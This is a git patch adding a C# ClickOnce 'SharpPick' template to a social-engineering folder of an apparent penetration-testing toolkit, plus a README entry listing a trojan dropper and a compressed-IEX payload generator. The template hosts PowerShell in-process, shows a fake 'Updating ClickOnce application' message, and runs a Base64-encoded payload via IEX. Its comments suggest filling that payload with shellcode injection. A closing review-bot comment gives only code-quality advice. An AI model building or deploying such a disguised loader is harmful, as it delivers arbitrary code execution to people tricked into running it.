From c52a66f3c9cc0f14a1b46212eb55179d4ab0555d Mon Sep 17 00:00:00 2001
From: Mariusz B
Date: Sat, 10 Feb 2018 16:45:32 +0100
Subject: [PATCH] Added ClickOnce SharpPick template.
---
 social-engineering/README.md | 2 +
 .../clickOnceSharpPickTemplate.cs | 69 +++++++++++++++++++
 2 files changed, 71 insertions(+)
 create mode 100644 social-engineering/clickOnceSharpPickTemplate.cs
diff --git a/social-engineering/README.md b/social-engineering/README.md
index 210148d..80888e8 100644
--- a/social-engineering/README.md
+++ b/social-engineering/README.md
@@ -4,6 +4,8 @@
 - **`backdoor-drop.js`** - Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. ([gist](https://gist.github.com/mgeeky/b0aed7c1e510560db50f96604b150dac))
+- **`clickOnceSharpPickTemplate.cs`** - This is a template for **C# Console Project** containing [SharpPick](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged ([ClickOnce](https://www.slideshare.net/NetSPI/all-you-need-is-one-a-click-once-love-story-secure360-2015))
+
 - **`compressedPowershell.py`** - Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) . ([gist](https://gist.github.com/mgeeky/e30ceecc2082a11b99c7b24b42bd77fc))
diff --git a/social-engineering/clickOnceSharpPickTemplate.cs b/social-engineering/clickOnceSharpPickTemplate.cs
new file mode 100644
index 0000000..6026ee9
--- /dev/null
+++ b/social-engineering/clickOnceSharpPickTemplate.cs
@@ -0,0 +1,69 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.IO;
+using System.Resources;
+using System.Net;
+
+using System.Collections.ObjectModel;
+
+//
+// Use NuGet to install System.Management.Automation reference.
+//
+using System.Management.Automation;
+using System.Management.Automation.Runspaces;
+
+namespace ConsoleApplication2
+ {
+ class Program
+ {
+ //
+ // This function and concept comes from PowerPick / SharpPick project by Sixdub:
+ // https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick
+ //
+ static string RunPS(string cmd)
+ {
+ // Init stuff
+ Runspace runspace = RunspaceFactory.CreateRunspace();
+ runspace.Open();
+ RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
+ Pipeline pipeline = runspace.CreatePipeline();
+
+ // Add commands
+ pipeline.Commands.AddScript(cmd);
+
+ // Prep PS for string output and invoke
+ pipeline.Commands.Add("Out-String");
+ Collection results = pipeline.Invoke();
+ runspace.Close();
+
+ // Convert records to strings
+ StringBuilder stringBuilder = new StringBuilder();
+ foreach (PSObject obj in results)
+ {
+ stringBuilder.Append(obj);
+ }
+ return stringBuilder.ToString().Trim();
+ }
+
+ static void Main()
+ {
+ Console.WriteLine("Updating ClickOnce application. Please wait...");
+
+ //
+ // Here comes your Base64 encoded Powershell payload.
+ // A good example of what to stick in here is a modified Invoke-Shellcode.ps1
+ // that will spawn a process and insert there some shellcode.
+ // You can prepare Base64 UTF8 shellcode via:
+ // PS> $text = Get-Content yourShellcode.ps1
+ // PS> $bytes = [System.Text.Encoding]::Unicode.GetBytes($text);
+ // PS> $encoded = [Convert]::ToBase64String($bytes);
+ // PS> $encoded | Out-File "myEncodedShellcode.ps1"
+ //
+ String base64encodedPayload = "";
+
+ RunPS("IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(\"" + base64encodedPayload + "\")))");
+ }
+ }
+}
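Review bot: `RunPS` never disposes the `Runspace` and `Pipeline` it creates, and `runspace.Close()` is only reached on the success path, so an exception from `pipeline.Invoke()` leaves the runspace open; the `RunspaceInvoke scriptInvoker` created on the line after `runspace.Open()` is never used and can be deleted. Replacing the two declarations with `using (Runspace runspace = RunspaceFactory.CreateRunspace())` and `using (Pipeline pipeline = runspace.CreatePipeline())` wrapping the existing body addresses the leak, since disposing the runspace also closes it. `Collection results = pipeline.Invoke();` has no type argument as shown and would not compile that way; this looks like a `<PSObject>` generic argument lost in rendering rather than in the committed file, which is worth confirming against the repository. A brief comment above `RunPS` stating that it hosts a new PowerShell runspace in-process and returns the script's `Out-String` output, e.g. `// Runs cmd in an in-process PowerShell runspace and returns its Out-String output, trimmed.`, would make the template's contract clear to readers who do not know the SharpPick project.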